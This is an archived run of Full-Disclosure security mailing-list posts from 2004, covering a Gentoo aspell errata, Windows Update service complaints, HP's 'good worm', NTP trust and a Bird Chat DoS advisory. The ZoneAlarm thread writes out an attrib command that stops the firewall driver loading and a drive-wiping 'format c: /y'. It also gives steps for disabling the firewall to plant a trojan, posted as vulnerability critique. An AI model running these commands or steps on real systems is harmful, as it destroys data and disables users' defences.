Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] ERRATA: [ GLSA 200406-14 ] aspell: Buffer overflow in word-list-compress
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: aspell: Buffer overflow in word-list-compress Date: August 23, 2004 Bugs: #53389 ID: 200406-14:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Errata == The previous security patch intended to fix this vulnerability was apparently incorrect in that it counted the words rather than characters. This revision fixes that. This was brought to our attention by by Ludwig Nussel <[EMAIL PROTECTED]> Affected packages = --- Package / Vulnerable /Unaffected --- 1 app-text/aspell <= 0.50.5-r3 >= 0.50.5-r4 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200406-14.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 pgpgm5HTA7lbb.pgp Description: PGP signature
Re: [Full-Disclosure] Windows Update
Unless you have actual experience with Microsoft updates screwing up your systems... Unless you care about actually understanding why your application suddenly stops working and have no idea that an update was rammed into your computer... So you are right, as long as you are a totally irresponsible admin, this change is a good idea. James Tucker wrote: There really should be no reason why you would want to disable the Automatic Updates service anyway, unless you are rolling out updates Experience teaches again and again about the folly of men. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] The 'good worm' from HP
Microsoft has. It is called SMS. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of The Central Scroutinizer Sent: Sunday, August 22, 2004 7:35 PM To: Mailing List - Full-Disclosure Subject: Re: [Full-Disclosure] The 'good worm' from HP Would it not be better to have a standard secure backdoor provided by a security package that could downloaded or installed by disk and works hand in hand with port scanning software, if this is really necassary. I am supprised Microsoft have not released such a peice of software; maybe a third party have. Aaron - Original Message - From: "Todd Towles" <[EMAIL PROTECTED]> To: "joe" <[EMAIL PROTECTED]> Cc: "Mailing List - Full-Disclosure" <[EMAIL PROTECTED]> Sent: Sunday, August 22, 2004 7:15 PM Subject: RE: [Full-Disclosure] The 'good worm' from HP >I hope it is a bad choice of words. He is a VP, should I say more? > > Even if it is a controlled worm that moves around in the internal > network patching computers, it sounds like a very stupid idea. > > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of joe > Sent: Sunday, August 22, 2004 8:20 AM > To: Todd Towles; [EMAIL PROTECTED]; > [EMAIL PROTECTED] > Subject: RE: [Full-Disclosure] The 'good worm' from HP > >> Allan is right. I didn't notice people calling it a worm. > > > From the article at InfoWorld... > > > We've been working with (customers) for the last month now," said Tony > Redmond, vice president and chief technology officer with HP Services in > an interview. > > "This is a good worm," said Redmond. "It's turning the techniques (of > the > attackers) back on them." > > > Possibly he used a bad choice of words. > > > > I definitely agree though that you probably shouldn't be "infecting" > machines to patch them. In order to patch through a hole like that you > are running code through that hole and that is the same as infecting in > my book, you just aren't propogating. You could still make the machine > unstable or cause other issues. I think my preference would be something > along the lines of what the NetSquid project is doing mentioned > previously but be more aggressive. Sure have the feed from SNORT to > actively go out and pop the machines currently sending bad traffic, but > also scan for machines that > *could* get infected and shut them down as well. That would be a good > use of this tech HP is working on, simply identify the machines. However > others have done the similar in terms of detection so that wouldn't be > nearly as new and daring. They could do a good thing by making it fully > supported by a big name, stable, quick, and part of an overall framework > for protecting the network environment. > > joe > > > > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of Todd Towles > Sent: Saturday, August 21, 2004 8:58 PM > To: [EMAIL PROTECTED]; [EMAIL PROTECTED] > Subject: RE: [Full-Disclosure] The 'good worm' from HP > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Unsecure file permission of ZoneAlarm pro. (ZA will fail to load)
--- Barrie Dempster <[EMAIL PROTECTED]> wrote: > In reply to my own previous email, I assumed ZA > would fail, as others > have on this list, with an EVERYONE:DENY security > policy, however this > isn't the case. > ZA 5.1 PRO Trial version will change this to > EVERYONE:FULL for the > duration of the program after which it will then > change these settings > back to the original EVERYONE:DENY. This throws out > the DoS theory, but > the permissions are still extremely permissive, if > the "truevector > driver" was to have issues with it's integrity > checks then the files in > this folder would be easily compromised. not really, just simply, go to internet log directory and , do ..\..\Internet Logs\>attrib/s +h +s +r +a *.* next time Zap'S "truevector driver" will fail to load. when the pc reboots or zap restarts... bipin ps: thanks for the 'Rant's-&-Raves' regarding NTFS (O; __ Do you Yahoo!? Yahoo! Mail Address AutoComplete - You start. We finish. http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windows Update
The AU shouldn't be a issue for anyone running SUS or SMS. It is a pain to turn it back on if you have already turned it off (my case) via corporate wide reg hack. But that is my issue and easily fixable. AU running in automatic mode will not install updates on its own. As long as you turn the automatic feature off in the control panel. I saw this problem on the gold version of XP. You tell it to not do automatic updates but the service starts up as automatic and waste CPU cycles and memory. That is why I put it to manual on all my computers on the network. But with XP SP2 - WindowsUpdate won't work if the service is set to manual. Great policy change from Microsoft? As far as admins turning it off to stop updates, why don't you try a proxy? Don't good admins use those? Sure, once a user gets thru the proxy, a update could be installed and that is problem. But I do understand the issue of automatic patching of systems. I was the primary SMS Admin for my company before getting a new job. Updates should be released in a controlled way in a coporate network. Look at it this way. If you use SMS you don't need AU and can leave it to manual. Therefore no local user can get to WindowsUpdate and you have now have more control over which patches are installed when and where. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of ASB Sent: Monday, August 23, 2004 8:02 AM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Windows Update Just because the Automatic Update service is enabled, doesn't mean that updates will be automatically "installed". There are various options for configuration. I require AU enabled because I'm using SUS, and I control when updates are available. The automatic nature of the service is not an implicit evil. -ASB On Sat, 21 Aug 2004 19:56:14 -0400, Über GuidoZ <[EMAIL PROTECTED]> wrote: > Umm, hold on a sec here... > > (snip from "James Tucker"): > > There really should be no reason why you would want to disable the > >Automatic Updates service anyway, unless you are rolling out updates > >using a centralised distribution system, in which case you would not > >need it anyway. > > I believe you are missing one fundamental point: SPs and updates are > notorious for breaking something else. (Especially from Microsoft.) > Granted, if fixing a security weakness breaks something you're using, > then that aspect could have been written better. However, that still > doesn't fix it when an entire business network goes down and YOU are > the one responsible. I do not allow ANY automatic updates (except for > virus definitions) to run on ANY networks I am in charge of. I take > the time (like every good sysadmin should) to look over each update > before applying it so I know three things: > > 1. What it's fixing/patching > 2. Why it's fixing/patching it > 3. What will be the end result of the fix/patch > > If you would simply allow updates and SPs to have free reign over your > system(s) without taking any time to look over those updates, you're > going to be one busy and irritated sysadmin. That is, if you still > have a job after a little bit. > > ~G > > P.S. Don't take my word for it. Look here: > - http://www.infoworld.com/article/04/08/12/HNdisablesp2_1.html > - http://www.pcworld.idg.com.au/index.php/id;1183008015;fp;2;fpid;1 > - http://www.integratedmar.com/ecl-usa/story.cfm?item=18619 > - http://www.vnunet.com/news/1157279 > - Or, find the other 200+ articles by searching Google News >for "disable automatic update sp2" =) > > > > On Sat, 21 Aug 2004 18:51:40 -0300, James Tucker <[EMAIL PROTECTED]> wrote: > > Here I found that I can have BITS and Automatic Updates in "manual", > > Windows Update works fine here. It may be a good idea to refresh the > > MMC console page, as you will probably find that at time the service > > had shut down if and when BITS was stopped prematurely (i.e. when it > > was in use). > > > > There really should be no reason why you would want to disable the > > Automatic Updates service anyway, unless you are rolling out updates > > using a centralised distribution system, in which case you would not > > need it anyway. > > > > If you are worried about system resources, you should look into how > > much the service really uses; the effect is negligable, in fact > > there is more impact if you select (scroll over) a large number of > > application shortcuts (due to the caching system) than if you leave > > Automatic Updates on. If you are worried about your privacy and you > > dont believe that the data sent back and forth has not been checked > > before, then you surely dont want to run Windows Updates ever. If > > you want to cull some real system resources and have not already > > done so, turn the Help and Support service to manual, that will save > > ~30mb on boot, up until the first use of XP help; this will stop > > help links from programs from forw
RE: [Full-Disclosure] Windows Update
> What I see Microsoft as doing is pretty much forcing > everyone to turn on Automatic Windows Update. Why > leave it as a control panel option, I've no clue. > Same with BIT (Background Intelligent Transfers.) > For the millions of users out there that are likely > subject to viruses, etc, I'm sure it will help make > things better, but for people who would fit into the > "power user" class, it's a real pain in the arse. > I really object to this philosophy because it does > not let a person plan the downloading and installation > of updates - some of which will require a reboot. No they aren't. If you don't want auto updates, you set it to no autoupdates, like my machine is now. Then it won't do anything unless you go out and tell it to. Of course the service is still running but if you are a power user, you know how to disable the service and reenable when you want to go get the updates. As I mentioned previously, this is kind of a pain, but certainly isn't forcing you to have AU on and has no impact on your planning of downloading and installing of updates. A power user knows it only takes a single command line to stop and disable the WU service and single command line to reenable and start it again. > What do large corporate installations of Windows do here? Depends on the company. The large ones I have worked/talked with, 5k+ seats to about 200k seats, use various methodologies for deploying software and patches, from custom in house services to simple batch files to SMS to Windows Update service either due to using SUS or using the Update Web Site. > Do they run their own caches of the Windows updates? In many cases yes. Depends on the deployment method. > Push out updates from servers rather than have clients pull? In some cases yes. > Is it all done with SUS? Nope, but many do. > Is SUS usable on a single node, in place of WU? SUS depends on the WU client. > The help for the "Windows Update" web site suggests > that it is possible to get updates without Automatic Updates. > Is the help out of date or is there a way to still do it > without AU on ? You go to the KB articles or security bulletins and download the qfe's manually. In my last job as a Server Admin, there wasn't a single update in 3 years I pulled through Windows Update Web site. In fact the company blocked that traffic at the firewall. I or our systems integration group would check out the new issues and download the patch or get it from Microsoft Support and then integrate it into our patching methodologies (basically batch it up for silent install) and test it to make sure the install wasn't damaging then test it for functionality then deploy it. The client group would slap the patch package into the software deployment system and it would zoom out to the local site servers where the local admins would schedule the deployment to their local workstations. There is no hard fast answer to patch management. Many at the corporate levels beat MS for that but then many others don't care as they already have something be it shavlik, SMS, SUS, or something they have whipped up for themselves from fancy batch files to interactive perl scripts to automatic service/daemon like service scripts, to actual custom executables. Personally I like the freedom of choice in how things can be deployed, I certainly wouldn't want to be railroaded into a single methodology like you misunderstand WU to be. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Darren Reed Sent: Monday, August 23, 2004 6:52 AM To: Security List Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Windows Update In some mail from Security List, sie said: > > Went to windows update last night w/ XP Pro. > Redirected to the v5 version. I was asked to install the new Windows > Update software...downloaded the WU software...copied the files...then > saw registering...kinda thinking that it was checking for a valid > registration or license. No updates needed according to WU. XP SP2 > is not available via WU for XP Pro yet. > > Now, I checked the Automatic Update service to see if it was turned > back start automatic as I always have it disabled. Yup, it was set to > automatic and it was started. I stop and disable automatic update > service, and try WU. Get error stating that the automatic update > service must be enable to use WU now. Has anybody else head of this? > Once again, we must have services that we do not want enable. I can > not believe that they are forcing user to turn on the service to use > WU. I discovered this when testing out v5beta and had to do a checkpoint recovery to restore version 4. If you don't install the latest Windows Update software (if, for example, you have all Active X stuff set for prompting and you say "no") then you don't even get to 1st base and Windows Updates (via a convienient mechanism) are not available. IMHO, this sucks big time.
RE: [Full-Disclosure] Unsecure file permission of ZoneAlarm pro. (ZA will fail to load)-WASTE OF TIME
ffs Open a cmd, type 'format c: /y' Omg, phone billy g, it's a massive DoS/vuln. Get a grip bipin. If a malicious user has command line access to your system, 'zonealarm' is the last thing you should be worrying about. -Original Message- From: bipin gautam [mailto:[EMAIL PROTECTED] Sent: 23 August 2004 15:34 To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Unsecure file permission of ZoneAlarm pro. (ZA will fail to load) --- Barrie Dempster <[EMAIL PROTECTED]> wrote: > In reply to my own previous email, I assumed ZA > would fail, as others > have on this list, with an EVERYONE:DENY security > policy, however this > isn't the case. > ZA 5.1 PRO Trial version will change this to > EVERYONE:FULL for the > duration of the program after which it will then > change these settings > back to the original EVERYONE:DENY. This throws out > the DoS theory, but > the permissions are still extremely permissive, if > the "truevector > driver" was to have issues with it's integrity > checks then the files in > this folder would be easily compromised. not really, just simply, go to internet log directory and , do ..\..\Internet Logs\>attrib/s +h +s +r +a *.* next time Zap'S "truevector driver" will fail to load. when the pc reboots or zap restarts... bipin ps: thanks for the 'Rant's-&-Raves' regarding NTFS (O; __ Do you Yahoo!? Yahoo! Mail Address AutoComplete - You start. We finish. http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] The 'good worm' from HP
>It's called WindowsUpdate? That cannot be used locally/internally by an organization. Aaron
Re: [Full-Disclosure] Safari/WebCore Content Sniffing
Mozilla does content sniffing on text/plain if the content includes
control characters ("invalid text/plain content"). Is this incorrect?
Is it a security hole -- for example, does it introduce XSS holes or
allow executable files to be run without a proper warning?
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Windows Update
Darren Reed wrote: What I see Microsoft as doing is pretty much forcing everyone to turn on Automatic Windows Update. Why leave it as a control panel option, I've no clue. Same with BIT (Background Intelligent Transfers.) For the millions of users out there that are likely subject to viruses, etc, I'm sure it will help make things better, but for people who would fit into the "power user" class, it's a real pain in the arse. I'm just annoyed that Microsoft now requires me to run another service if I want their update website to work when I use it. Turning off automatic updates in the control panel doesn't do anything to the service other than tell it to not poll the Microsoft site and tell me if I am missing something. I really object to this philosophy because it does not let a person plan the downloading and installation of updates - some of which will require a reboot. If you don't want to use Windows Update, you can always download each patch manually from the links provided in their monthly security bulletins. You are subscribed to their bulletins right? Once you have each patch downloaded, you can indeed plan the rollout to your system, don't forget you need a tool to check that your patches were installed correctly, like MBSA or HFNETCHK. What do large corporate installations of Windows do here? SUS, soon to be WUS. Do they run their own caches of the Windows updates? Yes, SUS, soon to be WUS. Push out updates from servers rather than have clients pull? Well, no. The clients really pull it from the SUS Server, which pulls it from Microsoft. Is it all done with SUS? Yes. Is SUS usable on a single node, in place of WU? Define node. On a workstation? No, you need a Windows Server (2000 or 2003) to run SUS from. You also cannot visit the SUS site from a workstation using IE and do a scan like you do with Windows Update. You have to schedule things so the client will poll the server for updates it is missing. The help for the "Windows Update" web site suggests that it is possible to get updates without Automatic Updates. Is the help out of date or is there a way to still do it without AU on ? Subscribe to the Monthly Security bulletins and download the patches using the links provided there. Or go to http://www.microsoft.com/security and click on the "More security updates..." link. I think you can take it from there. If you were a conspiracy theorist, you'd say this was Microsoft's way of being able to do more automatic updates before announcing a security vulnerability and mitigate the impact of 0-day exploits (developed through reverse engineering of changes.) No, if I were a conspiracy theorist I'd say Microsoft was pushing Automatic Updates so they could install secret backdoors on everyone's computers and then sneak in during the night to steal CPU cycles to donate to their friends from Betelgeuse 5 who need the help to plan their takeover of Planet Earth. -d ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] SOHO firewalls trust everyone? WAS Unsecure file permission of ZoneAlarm pro. (ZA will fail to load)
(BoneMachine you forgot to hit "reply all", the list didn't get your email.) [ scroll down for my reply ] On Mon, 2004-08-23 at 15:04, BoneMachine wrote: > Hello > Bipin showed that a method to prevent ZA to load is to change the attributes of the > files within %windir%/Internet Logs usintg the attrib command. > This is obviously something different than changing the ACL of the directory. > Have you (or anybody on the list for that matter) tested changing the attributes to > cause a DoS. > Also, if I follow the discussion correctly, it is possible to delete or move the > config file from the directory. Will this result in a DoS or is some overly > permissible default configuration created when the config files are moved from the > directory. > > Thank you for your time, > Bone Machine > > --- > "I can hardly wait Betty" - The Pixies I've tried deleting the files, the only deletable files are BACKUP.RDB and ZALog.txt when the program is running, all the rest are locked by the running process, but if you stop the process you can modify any file you like, the files are replaced on reload but my settings disappear, my firewall rules and other configuration modifications and so on all defaulted. This is not an issue for ZA? any user on my system can modify my configuration if at any point ZA is shutdown or crashes? I've also tried controlling ZA as a normal user, no wait, a RESTRICTED user (as per the windows 2000 add user wizard), I was able to switch the firewall off completely, and change the settings, so I don't need to delete or modify any files, I can break the firewall as anyone, ZA is designed to be a home/office product, ZoneLabs assume that everyone in the home or office should be allowed to mess with the firewall from a convenient location in the system tray. This is how most SOHO firewalls work. *!*_THIS IS BAD BAD BAD!_*!* MS have moved their OS to a more multi-user orientated approach with versions starting at 2k. (Although they still are determined to give the first user admin privs as well as the admin user) but most of the products running on the OS such as this _security_ product still treat it as a one user system, privilege separation is an alien concept to them. This makes many of the firewalls features useless. For example, if I want to stick a trojan on a ZA machine I know that as any user I can.. 1. Stop the firewall process 2. Install my trojan 3. Set the firewall to insanely open 4. Have my merry way owning this user spamming the zonelabs security team with "how to rip off your users with a fake security program" emails and DoSing SCO, just for fun. The user wont suspect a thing because ZA didn't popup and say " Hello, you've been owned, would you like evil_trojan.exe to rape the internet on your behalf? [DENY] [ALLOW] ". Maybe someone from ZoneLabs can explain to me the usefulness of keeping a list of programs allowed to access the net or a list of allowed outgoing ports if an attacker can modify this list at will without even breaking out of a restricted account? I don't see your logic, why not just switch off the outgoing filter altogether? seems like wasted cpu cycles which could be much better utilised by the trojan that previously infected the system and trivially bypassed the _firewall_. I don't want to single out ZA for this as I know other firewalls have the same setup. They are utterly useless against protecting from ANYTHING on the inside, the outbound filtering is broken if the rogue program can modify it at will. Security programs MUST be separated from the regular users on the system, or they provide no real protection at all. The argument against this could be "but a single user system will only have one user and they will have admin privs anyway so it wouldn't matter" My answer to that would be, the user only has admin privileges because of bad security design on the part of the OS vendor. Their design being broken isn't a valid reason to duplicate it. As a vendor of security products ZoneLabs and their peers as SOHO firewall developers should educate the user in the proper methods for securing their system. A false sense of security may benefit the pockets of the vendors shareholders, but it has a detrimental effect to their clients. IMO this is wilful negligence and a sure fire sign you should avoid the vendor's products. -- Barrie Dempster (zeedo) - Fortiter et Strenue http://www.bsrf.org.uk [ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ] signature.asc Description: This is a digitally signed message part
Re: [Full-Disclosure] The 'good worm' from HP
I'm fairly sure I disagree with you, Nick. I don't believe we need Brontchev's paper in hand or head to discuss whether or not self-replicating, active,"beneficial code" is a good idea or not. Contrary to the tone of some of your posts, many of us are fairly bright, reasonably well educated, and capable of forming our own opinions without someone else framing the debate for us. In fact, Brontchev's thoughts on constructing/distributing a beneficial virus come down, in the end, to just being a publish and subscribe software distribution method...hardly revolutionary or ground-breaking even when he wrote it. As relates specifically to HP/Active Countermeasures, however: HP Is looking to market /deploy this as a managed tool, most likely as a bolt on to OpenView, not "unleash" it on the net...more to the point, it is not viral (as described, in fact, in Bontchev's paper...so let's not quibble about that definition). As a managed systems tool, confined to pre-defined systems, it matters not a whit what Bontchev's paper has to say. If it's a functional, efficient tool to assist in keeping systems secure and patched it's going to be used. In the case of this specific product, I think that several posters here need to do a little mnore research into the product. It's a scanner, based on reported/compiled vulnerabilities, coupled with some rules-based capabilities such as taking a machine off a network, forcing patches, etc. I think too many people here (and elsewhere) heard the term "good worm" and leapt to a series of conclusions so quickly that they never bothered to find out what it was that they were talking about. Bart Lansing Manager, Desktop Services Kohl's IT Nick FitzGerald <[EMAIL PROTECTED]> Sent by: [EMAIL PROTECTED] 08/20/2004 09:14 PM Please respond to [EMAIL PROTECTED] To [EMAIL PROTECTED] cc Subject Re: [Full-Disclosure] The 'good worm' from HP Maarten wrote: > Stuff like counter-attacking has been discussed often, whether in large open > forums such as FD or in more private circles. Mostly, people were too > concerned to open themselves up for huge lawsuits and or for prosecution > even, but now that an important influential company like HP is suggesting > (building) it, this may well signifiy an important shift in the fight against > malware. I, for one, welcome the initiative... You need to read Vesselin Bontchev's classic "Are 'Good' Viruses Still a Bad Idea?" paper before you can even begin to enter this debate. And if you think the age of that paper automatically disbars it from contemporary discussion, the reason there are no more recent papers worth reading is because no-one has meaningfully challenged Bontchev's position since that paper was written. I hope the HP folk have read it and thought very carefully about all this... (Sadly the media reports are too "light and fluffy" to make anything sensible of what HP is really proposing.) -- Nick FitzGerald Computer Virus Consulting Ltd. Ph/FAX: +64 3 3529854 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Fwd: Re: FullDisclosure: Security aspects of time synchronization infrastructure
[EMAIL PROTECTED] wrote: Depending upon the criticality of the time sensitive applications on the network, you might want to reconsider the use of "radio clocks" and especially "GPS clocks". [...] For a fixed installation detecting if someone is dinking the gps signal is trivial. The unit starts thinking it is not in Kansas anymore. As far as I can remember, the gps is not accurate ... during US raids (i.e. against Iraq) I could not tell if time is affected or if it only reduce the precision over the location (50-20 meters during normal operation, 100-1000 meters during raids). Anyway, I use a couple internet & free ntp services (my ISP, some european & US labs, ...) If all the servers are compromised, I'm too (as far as time and I are concerned, I want my whole network to be synchronized, I don't really care for the real time, before configuring a remote ntp server, there was only a 'virtual' time (my whatch), which was enough for my logs), if only a few are, I can see there's a difference in the timing they provide (which,anyway, I don't care about). In germany (which means anywhere between spain and russia), there is an official radio-clock (known as dcf-77) which does not suffer the gps limitation (this is not a military toy). As an official clock (used for synching administratins, parking payments,... ) it have to be up and give the official accurate time 24-7, You (or at least I) can be confident with this time. Unfortunatly, most receivers do not work in machine rooms (too many ecm noise, sometimes, the building is radio-protected,...) you have to put your receivers (yes, one is not to be concidered reliable) out of your building ! These radio clock are easier to corrupt than gps (plain old fm against spread spectrum)... I never faced any real time-critical project,so for me (and I guess most admins), even the worst solution (internet NTP) is more than enough right now (it may change in the future). Anyway if you consider this kind of solution (internet NTP), do not forget ACL on your routers/firewalls, use a single/cluster ntp server for synching your network, do not let multile servers sync with the internet NTP.
Re: [Full-Disclosure] Windows Update
Just because the Automatic Update service is enabled, doesn't mean that updates will be automatically "installed". There are various options for configuration. I require AU enabled because I'm using SUS, and I control when updates are available. The automatic nature of the service is not an implicit evil. -ASB On Sat, 21 Aug 2004 19:56:14 -0400, Über GuidoZ <[EMAIL PROTECTED]> wrote: > Umm, hold on a sec here... > > (snip from "James Tucker"): > > There really should be no reason why you would want to disable the > > Automatic Updates service anyway, unless you are rolling out updates > > using a centralised distribution system, in which case you would not > >need it anyway. > > I believe you are missing one fundamental point: SPs and updates are > notorious for breaking something else. (Especially from Microsoft.) > Granted, if fixing a security weakness breaks something you're using, > then that aspect could have been written better. However, that still > doesn't fix it when an entire business network goes down and YOU are > the one responsible. I do not allow ANY automatic updates (except for > virus definitions) to run on ANY networks I am in charge of. I take > the time (like every good sysadmin should) to look over each update > before applying it so I know three things: > > 1. What it's fixing/patching > 2. Why it's fixing/patching it > 3. What will be the end result of the fix/patch > > If you would simply allow updates and SPs to have free reign over your > system(s) without taking any time to look over those updates, you're > going to be one busy and irritated sysadmin. That is, if you still > have a job after a little bit. > > ~G > > P.S. Don't take my word for it. Look here: > - http://www.infoworld.com/article/04/08/12/HNdisablesp2_1.html > - http://www.pcworld.idg.com.au/index.php/id;1183008015;fp;2;fpid;1 > - http://www.integratedmar.com/ecl-usa/story.cfm?item=18619 > - http://www.vnunet.com/news/1157279 > - Or, find the other 200+ articles by searching Google News >for "disable automatic update sp2" =) > > > > On Sat, 21 Aug 2004 18:51:40 -0300, James Tucker <[EMAIL PROTECTED]> wrote: > > Here I found that I can have BITS and Automatic Updates in "manual", > > Windows Update works fine here. It may be a good idea to refresh the > > MMC console page, as you will probably find that at time the service > > had shut down if and when BITS was stopped prematurely (i.e. when it > > was in use). > > > > There really should be no reason why you would want to disable the > > Automatic Updates service anyway, unless you are rolling out updates > > using a centralised distribution system, in which case you would not > > need it anyway. > > > > If you are worried about system resources, you should look into how > > much the service really uses; the effect is negligable, in fact there > > is more impact if you select (scroll over) a large number of > > application shortcuts (due to the caching system) than if you leave > > Automatic Updates on. If you are worried about your privacy and you > > dont believe that the data sent back and forth has not been checked > > before, then you surely dont want to run Windows Updates ever. If you > > want to cull some real system resources and have not already done so, > > turn the Help and Support service to manual, that will save ~30mb on > > boot, up until the first use of XP help; this will stop help links > > from programs from forwarding to the correct page, until the service > > has loaded once. > > > > As for worry over using bandwidth on your internet service, again, you > > want to check this out as its a trickle service, not a flood. BITS > > does not stand for Bloody Idiots Trashing Service; it means what it > > says on the tin. > > > > On Fri, 20 Aug 2004 14:30:22 -0700, David Vincent > > > > > > <[EMAIL PROTECTED]> wrote: > > > joe wrote: > > > > > > >Yep, this is how it works now. > > > > > > > >You control whether Windows Update is updating or not via the security panel > > > >in the control panel applets (wscui.cpl). > > > > > > > > > > > To eb complete, I should have mentioned I have Automatic Updates turned > > > off in the control panel. I also had the service disabled before > > > applying SP2 and venturing to Windows Update v5. > > > > > > >Of course if you aren't using automatic update you could always disable the > > > >service and just reenable when you go to do the update, or don't use windows > > > >update at all and just pull the downloads separately. We are talking about a > > > >single command line to reenable that service > > > > > > > > > > > Yep. > > > > > > >Is it a pain? Yes, for those who like to run minimal services. Is it a > > > >security issue or life threatening, probably not. > > > > > > > > > > > Agreed. > > > > > > -d ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Windows Update
~ I really object to this philosophy because it does not let a person plan the downloading and installation of updates - some of which will require a reboot. ~ Feel free to elaborate on how it prevents this. ~ > What do large corporate installations of Windows do here? > Do they run their own caches of the Windows updates? > Push out updates from servers rather than have clients pull? > Is it all done with SUS? > Is SUS usable on a single node, in place of WU? ~ There are a number of patching solutions for Windows, some push-based and some pull-based. Many folks use SUS in some capacity, even if augmented by 3rd party solutions. SUS requires AU, but the admin can control what patches are available and when they are installed. It's all explained in the SUS docs, and at http://www.susserver.org -ASB On Mon, 23 Aug 2004 20:52:01 +1000 (Australia/NSW), Darren Reed <[EMAIL PROTECTED]> wrote: > In some mail from Security List, sie said: > > > > Went to windows update last night w/ XP Pro. > > Redirected to the v5 version. I was asked to install > > the new Windows Update software...downloaded the WU > > software...copied the files...then saw > > registering...kinda thinking that it was checking for > > a valid registration or license. No updates needed > > according to WU. XP SP2 is not available via WU for > > XP Pro yet. > > > > Now, I checked the Automatic Update service to see if > > it was turned back start automatic as I always have it > > disabled. Yup, it was set to automatic and it was > > started. I stop and disable automatic update service, > > and try WU. Get error stating that the automatic > > update service must be enable to use WU now. Has > > anybody else head of this? Once again, we must have > > services that we do not want enable. I can not > > believe that they are forcing user to turn on the > > service to use WU. > > I discovered this when testing out v5beta and had to do a checkpoint > recovery to restore version 4. If you don't install the latest > Windows Update software (if, for example, you have all Active X stuff > set for prompting and you say "no") then you don't even get to 1st > base and Windows Updates (via a convienient mechanism) are not available. > IMHO, this sucks big time. > > What I see Microsoft as doing is pretty much forcing everyone to turn > on Automatic Windows Update. Why leave it as a control panel option, > I've no clue. Same with BIT (Background Intelligent Transfers.) > For the millions of users out there that are likely subject to viruses, > etc, I'm sure it will help make things better, but for people who would > fit into the "power user" class, it's a real pain in the arse. > > I really object to this philosophy because it does not let a person > plan the downloading and installation of updates - some of which will > require a reboot. > > What do large corporate installations of Windows do here? > Do they run their own caches of the Windows updates? > Push out updates from servers rather than have clients pull? > Is it all done with SUS? > Is SUS usable on a single node, in place of WU? > The help for the "Windows Update" web site suggests that it is > possible to get updates without Automatic Updates. Is the help > out of date or is there a way to still do it without AU on ? > > If you were a conspiracy theorist, you'd say this was Microsoft's way > of being able to do more automatic updates before announcing a security > vulnerability and mitigate the impact of 0-day exploits (developed through > reverse engineering of changes.) > > Darren > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] DoS in Bird Chat 1.61
Donato Ferrante Application: Bird Chat http://birdchat.sourceforge.net/ Version: 1.61 Bug: Denial Of Service Date: 23-Aug-2004 Author: Donato Ferrante e-mail: [EMAIL PROTECTED] web:www.autistici.org/fdonato xxx 1. Description 2. The bug 3. The code 4. The fix xxx 1. Description: Vendor's Description: "Bird Chat is a chat client / server software designed with an easy and simple interface." xxx 2. The bug: The bug is a denial of service versus clients, in fact an attacker can crash all the chat clients connected to the chat server, by using few fake users. xxx - 3. The code: - To test the vulnerability: http://www.autistici.org/fdonato/poc/BirdChat[161]DoS-poc.zip xxx 4. The fix: No fix. The vendor has not answered to my signalations. xxx ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] ERRATA: [ GLSA 200408-21 ] Cacti: SQL injection vulnerability
